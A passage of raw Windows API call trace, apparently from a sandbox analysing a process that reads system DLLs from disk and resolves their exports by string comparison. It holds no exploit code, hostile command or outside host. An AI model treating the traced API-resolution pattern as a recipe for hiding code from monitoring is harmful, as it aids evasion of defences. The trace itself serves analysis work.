0x7ffc5ecfdaa0 [0138.948] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0138.948] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=2647552) returned 1 [0138.948] GetProcessHeap () returned 0x520000 [0138.948] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x286600) returned 0x4124040 [0138.954] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0138.954] ReadFile (in: hFile=0x140, lpBuffer=0x4124040, nNumberOfBytesToRead=0x286600, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4124040*, lpNumberOfBytesRead=0x14f5a4*=0x286600, lpOverlapped=0x0) returned 1 [0139.432] CloseHandle (hObject=0x140) returned 1 [0139.432] lstrcmpA (lpString1="AppCacheCheckManifest", lpString2="AppCacheCheckManifest") returned 0 [0139.433] lstrcmpA (lpString1="AppCacheCloseHandle", lpString2="AppCacheCheckManifest") returned 1 [0139.433] lstrcmpA (lpString1="AppCacheCloseHandle", lpString2="AppCacheCloseHandle") returned 0 [0139.433] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCheckManifest") returned 1 [0139.433] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCloseHandle") returned 1 [0139.433] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCreateAndCommitFile") returned 0 [0139.433] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCheckManifest") returned 1 [0139.433] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCloseHandle") returned 1 [0139.433] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0139.433] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheDeleteGroup") returned 0 [0139.433] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCheckManifest") returned 1 [0139.433] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCloseHandle") returned 1 [0139.433] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0139.433] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheDeleteGroup") returned 1 [0139.433] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheDeleteIEGroup") returned 0 [0139.433] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCheckManifest") returned 1 [0139.433] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCloseHandle") returned 1 [0139.433] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCreateAndCommitFile") returned 1 [0139.433] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDeleteGroup") returned 1 [0139.433] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDeleteIEGroup") returned 1 [0139.433] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDuplicateHandle") returned 0 [0139.433] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCheckManifest") returned 1 [0139.433] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCloseHandle") returned 1 [0139.433] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCreateAndCommitFile") returned 1 [0139.433] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDeleteGroup") returned 1 [0139.433] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDeleteIEGroup") returned 1 [0139.433] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDuplicateHandle") returned 1 [0139.434] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheFinalize") returned 0 [0139.434] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCheckManifest") returned 1 [0139.434] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCloseHandle") returned 1 [0139.434] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0139.434] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDeleteGroup") returned 1 [0139.434] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDeleteIEGroup") returned 1 [0139.434] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDuplicateHandle") returned 1 [0139.434] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheFinalize") returned 1 [0139.434] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheFreeDownloadList") returned 0 [0139.434] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCheckManifest") returned 1 [0139.434] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCloseHandle") returned 1 [0139.434] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0139.434] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0139.434] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0139.434] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0139.434] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFinalize") returned 1 [0139.434] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0139.434] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFreeGroupList") returned 0 [0139.434] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCheckManifest") returned 1 [0139.434] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCloseHandle") returned 1 [0139.434] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCreateAndCommitFile") returned 1 [0139.434] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDeleteGroup") returned 1 [0139.434] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDeleteIEGroup") returned 1 [0139.434] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDuplicateHandle") returned 1 [0139.434] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFinalize") returned 1 [0139.434] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeDownloadList") returned 1 [0139.434] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeGroupList") returned 1 [0139.434] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeIESpace") returned 0 [0139.435] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCheckManifest") returned 1 [0139.435] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCloseHandle") returned 1 [0139.435] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCreateAndCommitFile") returned 1 [0139.435] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDeleteGroup") returned 1 [0139.435] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDeleteIEGroup") returned 1 [0139.435] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDuplicateHandle") returned 1 [0139.435] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFinalize") returned 1 [0139.435] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeDownloadList") returned 1 [0139.435] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeGroupList") returned 1 [0139.435] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeIESpace") returned 1 [0139.435] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeSpace") returned 0 [0139.435] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCheckManifest") returned 1 [0139.435] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCloseHandle") returned 1 [0139.435] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0139.435] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDeleteGroup") returned 1 [0139.435] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDeleteIEGroup") returned 1 [0139.435] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDuplicateHandle") returned 1 [0139.435] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFinalize") returned 1 [0139.435] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeDownloadList") returned 1 [0139.435] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeGroupList") returned 1 [0139.435] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeIESpace") returned 1 [0139.435] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeSpace") returned 1 [0139.435] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheGetDownloadList") returned 0 [0139.435] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCheckManifest") returned 1 [0139.435] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCloseHandle") returned 1 [0139.435] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCreateAndCommitFile") returned 1 [0139.435] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDeleteGroup") returned 1 [0139.435] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDeleteIEGroup") returned 1 [0139.435] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDuplicateHandle") returned 1 [0139.435] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFinalize") returned 1 [0139.435] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeDownloadList") returned 1 [0139.435] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeGroupList") returned 1 [0139.435] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeIESpace") returned 1 [0139.435] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeSpace") returned 1 [0139.435] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheGetDownloadList") returned 1 [0139.435] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheGetFallbackUrl") returned 0 [0139.436] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCheckManifest") returned 1 [0139.436] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCloseHandle") returned 1 [0139.436] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0139.436] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0139.436] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0139.436] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0139.436] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFinalize") returned 1 [0139.436] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0139.436] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeGroupList") returned 1 [0139.436] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeIESpace") returned 1 [0139.436] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeSpace") returned 1 [0139.436] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetDownloadList") returned 1 [0139.436] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetFallbackUrl") returned 1 [0139.436] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetGroupList") returned 0 [0139.436] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCheckManifest") returned 1 [0139.436] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCloseHandle") returned 1 [0139.436] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0139.436] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0139.436] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0139.436] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0139.436] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFinalize") returned 1 [0139.436] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0139.436] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeGroupList") returned 1 [0139.436] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeIESpace") returned 1 [0139.436] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeSpace") returned 1 [0139.436] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetDownloadList") returned 1 [0139.436] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetFallbackUrl") returned 1 [0139.436] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetGroupList") returned 1 [0139.436] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetIEGroupList") returned 0 [0139.436] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCheckManifest") returned 1 [0139.436] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCloseHandle") returned 1 [0139.436] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCreateAndCommitFile") returned 1 [0139.436] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDeleteGroup") returned 1 [0139.437] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDeleteIEGroup") returned 1 [0139.437] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDuplicateHandle") returned 1 [0139.437] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFinalize") returned 1 [0139.437] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeDownloadList") returned 1 [0139.437] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeGroupList") returned 1 [0139.437] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeIESpace") returned 1 [0139.437] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeSpace") returned 1 [0139.437] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetDownloadList") returned 1 [0139.437] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetFallbackUrl") returned 1 [0139.437] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetGroupList") returned 1 [0139.437] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetIEGroupList") returned 1 [0139.437] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetInfo") returned 0 [0139.437] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCheckManifest") returned 1 [0139.444] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCloseHandle") returned 1 [0139.444] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCreateAndCommitFile") returned 1 [0139.444] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDeleteGroup") returned 1 [0139.444] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDeleteIEGroup") returned 1 [0139.444] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDuplicateHandle") returned 1 [0139.444] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFinalize") returned 1 [0139.444] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeDownloadList") returned 1 [0139.444] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeGroupList") returned 1 [0139.444] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeIESpace") returned 1 [0139.444] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeSpace") returned 1 [0139.444] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetDownloadList") returned 1 [0139.444] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetFallbackUrl") returned 1 [0139.444] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetGroupList") returned 1 [0139.444] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetIEGroupList") returned 1 [0139.444] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetInfo") returned 1 [0139.444] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetManifestUrl") returned 0 [0139.444] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCheckManifest") returned 1 [0139.444] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCloseHandle") returned 1 [0139.444] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0139.444] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDeleteGroup") returned 1 [0139.444] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDeleteIEGroup") returned 1 [0139.444] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDuplicateHandle") returned 1 [0139.444] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFinalize") returned 1 [0139.445] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeDownloadList") returned 1 [0139.445] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeGroupList") returned 1 [0139.445] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeIESpace") returned 1 [0139.445] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeSpace") returned 1 [0139.445] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetDownloadList") returned 1 [0139.445] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetFallbackUrl") returned 1 [0139.445] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetGroupList") returned 1 [0139.445] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetIEGroupList") returned 1 [0139.445] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetInfo") returned 1 [0139.445] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetManifestUrl") returned 1 [0139.445] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheLookup") returned 0 [0139.445] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCheckManifest") returned 1 [0139.445] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCloseHandle") returned 1 [0139.445] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCreateAndCommitFile") returned 1 [0139.445] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDeleteGroup") returned 1 [0139.445] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDeleteIEGroup") returned 1 [0139.445] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDuplicateHandle") returned 1 [0139.445] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFinalize") returned 1 [0139.445] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeDownloadList") returned 1 [0139.445] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeGroupList") returned 1 [0139.445] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeIESpace") returned 1 [0139.445] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeSpace") returned 1 [0139.445] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetDownloadList") returned 1 [0139.445] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetFallbackUrl") returned 1 [0139.445] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetGroupList") returned 1 [0139.445] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetIEGroupList") returned 1 [0139.445] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetInfo") returned 1 [0139.445] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetManifestUrl") returned 1 [0139.445] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheLookup") returned 1 [0139.445] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="CommitUrlCacheEntryA") returned 0 [0139.446] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCheckManifest") returned 1 [0139.446] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCloseHandle") returned 1 [0139.446] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCreateAndCommitFile") returned 1 [0139.446] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDeleteGroup") returned 1 [0139.446] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDeleteIEGroup") returned 1 [0139.446] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDuplicateHandle") returned 1 [0139.446] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFinalize") returned 1 [0139.446] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeDownloadList") returned 1 [0139.446] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeGroupList") returned 1 [0139.446] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeIESpace") returned 1 [0139.446] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeSpace") returned 1 [0139.446] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetDownloadList") returned 1 [0139.446] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetFallbackUrl") returned 1 [0139.446] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetGroupList") returned 1 [0139.446] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetIEGroupList") returned 1 [0139.446] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetInfo") returned 1 [0139.446] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetManifestUrl") returned 1 [0139.446] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheLookup") returned 1 [0139.446] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="CommitUrlCacheEntryA") returned 1 [0139.446] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="CommitUrlCacheEntryBinaryBlob") returned 0 [0139.446] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCheckManifest") returned 1 [0139.446] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCloseHandle") returned 1 [0139.446] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCreateAndCommitFile") returned 1 [0139.446] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDeleteGroup") returned 1 [0139.446] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDeleteIEGroup") returned 1 [0139.446] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDuplicateHandle") returned 1 [0139.446] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFinalize") returned 1 [0139.446] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeDownloadList") returned 1 [0139.446] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeGroupList") returned 1 [0139.447] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeIESpace") returned 1 [0139.447] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeSpace") returned 1 [0139.447] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetDownloadList") returned 1 [0139.447] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetFallbackUrl") returned 1 [0139.447] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetGroupList") returned 1 [0139.447] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetIEGroupList") returned 1 [0139.447] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetInfo") returned 1 [0139.447] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetManifestUrl") returned 1 [0139.447] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheLookup") returned 1 [0139.447] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryA") returned 1 [0139.447] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryBinaryBlob") returned 1 [0139.447] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryW") returned 0 [0139.447] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCheckManifest") returned 1 [0139.447] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCloseHandle") returned 1 [0139.447] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCreateAndCommitFile") returned 1 [0139.447] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDeleteGroup") returned 1 [0139.447] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDeleteIEGroup") returned 1 [0139.447] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDuplicateHandle") returned 1 [0139.447] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFinalize") returned 1 [0139.447] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeDownloadList") returned 1 [0139.447] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeGroupList") returned 1 [0139.447] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeIESpace") returned 1 [0139.447] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeSpace") returned 1 [0139.447] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetDownloadList") returned 1 [0139.447] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetFallbackUrl") returned 1 [0139.447] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetGroupList") returned 1 [0139.447] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetIEGroupList") returned 1 [0139.447] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetInfo") returned 1 [0139.447] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetManifestUrl") returned 1 [0139.447] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheLookup") returned 1 [0139.726] GetProcessHeap () returned 0x520000 [0139.726] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x4124040 | out: hHeap=0x520000) returned 1 [0139.738] GetProcessHeap () returned 0x520000 [0139.738] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x5397a0 [0139.739] LoadLibraryA (lpLibFileName="Advapi32.dll") returned 0x7ffc5ec20000 [0139.740] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0139.740] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0139.740] GetModuleFileNameA (in: hModule=0x7ffc5ec20000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0139.740] CreateFileA (lpFileName="C:\\Windows\\system32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0139.740] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0139.740] GetProcAddress (hModule=0x7ffc5ecd0000, 